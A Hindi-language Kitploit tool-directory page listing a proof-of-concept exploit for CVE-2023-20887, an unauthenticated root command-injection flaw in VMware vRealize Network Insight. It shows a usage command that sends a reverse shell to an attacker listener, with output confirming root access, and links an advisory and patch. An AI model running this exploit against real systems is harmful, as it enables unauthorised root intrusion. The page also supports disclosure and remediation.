Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight पूर्व-प्रमाणित RCE (CVE-2023-20887) | Kitploit
उपकरण/GitHubGitHub/sinsinology/cve-2023-20887
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubsinsinology/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight पूर्व-प्रमाणित RCE (CVE-2023-20887)

रिपॉजिटरी देखें
2294113 साल पहलेKitploit द्वारा समीक्षित
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-20887

CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) अप्रमाणित RCE के लिए POC

तकनीकी विश्लेषण

इस कमज़ोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

poc

सारांश

VMWare Aria Operations for Networks (vRealize Network Insight) Apache Thrift RPC इंटरफ़ेस के माध्यम से उपयोगकर्ता इनपुट स्वीकार करते समय कमांड इंजेक्शन के प्रति संवेदनशील है। यह कमज़ोरी एक दूरस्थ अप्रमाणित हमलावर को अंतर्निहित ऑपरेटिंग सिस्टम पर root उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करने की अनुमति देती है। RPC इंटरफ़ेस एक रिवर्स प्रॉक्सी द्वारा सुरक्षित है जिसे बायपास किया जा सकता है। VMware ने इस मुद्दे की गंभीरता का मूल्यांकन अधिकतम CVSSv3 आधार स्कोर 9.8 के साथ क्रिटिकल गंभीरता श्रेणी में किया है। एक दुर्भावनापूर्ण अभिनेता उपकरण पर 'root' के संदर्भ में रिमोट कोड निष्पादन प्राप्त कर सकता है। VMWare 6.x संस्करण कमज़ोर हैं।

उपयोग

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

शमन उपाय

नवीनतम संस्करण में अपडेट करें या Progress Advisory के निर्देशों का पालन करके शमन करें

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

नवीनतम सुरक्षा अनुसंधान के लिए हमें Twitter पर फ़ॉलो करें:

  • SinSinology
  • SummoningTeam

अस्वीकरण

यह सॉफ़्टवेयर पूर्ण रूप से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना के अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।

टूल डाउनलोड करें